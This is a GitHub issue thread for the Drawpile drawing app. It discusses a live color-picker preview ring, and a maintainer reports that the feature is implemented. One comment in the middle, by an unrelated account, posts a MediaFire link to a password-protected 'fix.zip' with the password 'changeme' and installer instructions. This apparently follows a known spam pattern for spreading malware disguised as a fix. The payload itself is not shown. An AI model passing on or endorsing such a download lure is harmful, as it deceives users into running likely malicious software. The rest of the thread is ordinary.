### ISSUE TITLE
Preview picked color on canvas

### ISSUE THREAD

**Issue by MorrowShore** [drawpile/Drawpile#1362]
Live preview of what the colorpicker is hovering over.
![image](https://github.com/user-attachments/assets/885d21a8-9103-46d9-b7df-f8d65c8e43fa)
![image](https://github.com/user-attachments/assets/0da0301f-c801-4003-b1bc-be1c259a8294)

Similar double ring design to the #1361, where one ring is dedicated to primary objective, and another ring used for comparison; a half is the color used previously in a brush, and the other is the color last picked by colorpicker.

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by askmeaboutlo0m** [comment]
Preview is implemented. Background color picking split off into a separate issue #1373 so that it's clear what's done and what's still open, since those are two unrelated tasks.
